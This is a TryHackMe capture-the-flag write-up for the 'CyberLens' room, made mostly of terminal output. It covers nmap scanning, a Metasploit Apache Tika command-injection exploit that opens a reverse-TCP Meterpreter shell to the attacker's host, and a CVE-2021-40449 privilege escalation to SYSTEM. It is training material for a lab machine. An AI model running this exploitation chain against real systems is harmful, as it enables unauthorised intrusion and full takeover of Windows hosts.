CyberLens
Date: May 18th, 2024, Author: Anthony J. Saab
Last updated
Was this helpful?
Date: May 18th, 2024, Author: Anthony J. Saab
Last updated
Was this helpful?
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: CyberLens_v7
This writeup walks you through a room on TryHackMe created by , , and
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sS -T4 -p- -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 20:09 EEST
Nmap scan report for cyberlens.thm (10.10.197.190)
Host is up (0.12s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49677/tcp open unknown
61777/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 335.20 secondsโโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sC -sV -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:10 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T18:10:14+00:00
|_ssl-date: 2024-05-18T18:10:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T18:05:59
|_Not valid after: 2024-11-16T18:05:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61777/tcp open http Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods:
|_ Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-18T18:10:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.02 secondsโโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:12 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
| vulners:
| cpe:/a:apache:http_server:2.4.57:
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 0.0 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
|_ 45D138AD-BEC6-552A-91EA-8816914CA7F4 0.0 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
61777/tcp open http Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| vulners:
| cpe:/a:mortbay:jetty:8.y.z-snapshot:
|_ SSV:26121 7.8 https://vulners.com/seebug/SSV:26121 *EXPLOIT*
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds
It turns out that port 61777 is Apache Tika 1.17:
โโโ(kaliใฟkali)-[~]
โโ$ sudo msfdb init && msfconsole
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v6.4.5-dev ]
+ -- --=[ 2413 exploits - 1242 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Tika
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
1 post/linux/gather/puppet . normal No Puppet Config Gather
2 auxiliary/scanner/http/wp_gimedia_library_file_read . normal No WordPress GI-Media Library Plugin Directory Traversal Vulnerability
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options
Module options (exploit/windows/http/apache_tika_jp2_jscript):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9998 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.126.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set SRVHOST 10.11.85.12
SRVHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set VHOST cyberlens.thm
VHOST => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Sending stage (176198 bytes) to 10.10.41.34
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.41.34:49786) at 2024-05-18 21:21:57 +0300
meterpreter > shelkl
[-] Unknown command: shelkl. Did you mean shell? Run the help command for more details.
meterpreter > shell
Process 5840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
cyberlens\cyberlens
C:\Windows\system32>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
06/06/2023 07:48 PM <DIR> .
06/06/2023 07:48 PM <DIR> ..
03/17/2021 03:13 PM <DIR> Administrator
11/25/2023 07:31 AM <DIR> CyberLens
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 14,950,584,320 bytes free
C:\Windows\system32>type C:\Users\CyberLens\Desktop\user.txt
type C:\Users\CyberLens\Desktop\user.txt
--SNIP--meterpreter > sysinfo
Computer : CYBERLENS
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
404 4 smss.exe
500 796 svchost.exe
576 564 csrss.exe
656 644 csrss.exe
660 796 svchost.exe
676 564 wininit.exe
728 644 winlogon.exe
792 796 svchost.exe
796 676 services.exe
820 676 lsass.exe
920 796 svchost.exe
940 796 svchost.exe
960 676 fontdrvhost.exe
968 728 fontdrvhost.exe
1032 796 svchost.exe
1068 728 dwm.exe
1108 796 svchost.exe
1228 4136 conhost.exe
1264 796 svchost.exe
1280 796 svchost.exe
1288 796 svchost.exe
1296 796 svchost.exe
1372 796 svchost.exe
1380 796 svchost.exe
1388 796 svchost.exe
1396 796 svchost.exe
1428 796 svchost.exe
1476 796 svchost.exe
1496 796 msdtc.exe
1512 796 svchost.exe
1524 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
1532 796 svchost.exe
1540 796 svchost.exe
1548 796 svchost.exe
1592 796 svchost.exe
1640 796 svchost.exe
1720 796 svchost.exe
1776 796 svchost.exe
1784 796 svchost.exe
1848 796 svchost.exe
1956 796 svchost.exe
1976 796 svchost.exe
2140 796 svchost.exe
2196 796 svchost.exe
2208 796 svchost.exe
2268 796 svchost.exe
2296 4640 java.exe x64 1 CYBERLENS\CyberLens C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe
2312 796 svchost.exe
2500 796 svchost.exe
2508 796 svchost.exe
2608 796 spoolsv.exe
2628 796 svchost.exe
2636 796 svchost.exe
2664 2296 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
2672 796 svchost.exe
2724 796 svchost.exe
2732 796 svchost.exe
2740 796 svchost.exe
2772 796 svchost.exe
2780 796 svchost.exe
2844 2196 sihost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\sihost.exe
2868 796 LiteAgent.exe
2968 1592 taskhostw.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\taskhostw.exe
3012 796 svchost.exe
3028 796 svchost.exe
3084 3464 ctfmon.exe x64 1
3452 796 svchost.exe
3464 796 svchost.exe
3488 4640 httpd.exe x64 1 CYBERLENS\CyberLens C:\Apache24\bin\httpd.exe
3572 3488 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
3696 796 svchost.exe
3816 796 svchost.exe
3868 940 WmiPrvSE.exe
4004 796 svchost.exe
4024 796 svchost.exe
4040 796 svchost.exe
4060 796 svchost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\svchost.exe
4080 796 svchost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\svchost.exe
4136 1592 CompatTelRunner.exe
4180 4164 explorer.exe x64 1 CYBERLENS\CyberLens C:\Windows\explorer.exe
4380 940 ShellExperienceHost.exe x64 1 CYBERLENS\CyberLens C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperien
ceHost.exe
4492 940 SearchUI.exe x64 1 CYBERLENS\CyberLens C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchU
I.exe
4552 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
4736 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
4908 796 amazon-ssm-agent.exe
4992 4908 ssm-agent-worker.exe
5000 4992 conhost.exe
5140 940 WmiPrvSE.exe
5164 5904 1GaWil.exe x86 1 CYBERLENS\CyberLens C:\Users\CYBERL~1\AppData\Local\Temp\1GaWil.exe
5176 796 svchost.exe
5180 5340 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
5456 3488 httpd.exe x64 1 CYBERLENS\CyberLens C:\Apache24\bin\httpd.exe
5756 796 svchost.exe
5904 5340 cmd.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\cmd.exe
6112 1592 taskhostw.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\taskhostw.exe
meterpreter > migrate 4180
[*] Migrating from 5164 to 4180...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : CYBERLENS
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > setg SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.108.65 - Collecting local exploits for x64/windows...
[*] 10.10.108.65 - 193 exploit checks are being tried...
[+] 10.10.108.65 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.108.65 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/always_install_elevated Yes The target is vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2021_40449 Yes The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
8 exploit/windows/local/cve_2022_21882_win32k Yes The target appears to be vulnerable.
9 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
14 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
15 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
16 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
17 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
18 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
19 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
20 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 10.0.17763.557
21 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
22 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
23 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
24 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
25 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
26 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable.
27 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
28 exploit/windows/local/ikeext_service No The check raised an exception.
29 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
30 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2019 (10.0 Build 17763). is not vulnerable
31 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
32 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
33 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
34 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
35 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
36 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
39 exploit/windows/local/panda_psevents No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
42 exploit/windows/local/tokenmagic No The target is not exploitable.
43 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
44 exploit/windows/local/webexec No The check raised an exception.
45 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > #7 seems very promising
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 5340 launched.
[*] Reflectively injecting the DLL into 5340...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.108.65
[*] Meterpreter session 3 opened (10.11.85.12:4444 -> 10.10.108.65:49810) at 2024-05-19 11:02:02 +0300
meterpreter > shell
Process 5372 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\
cd C:\
C:\>dir /s admin.txt
dir /s admin.txt
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
11/27/2023 07:50 PM 24 admin.txt
1 File(s) 24 bytes
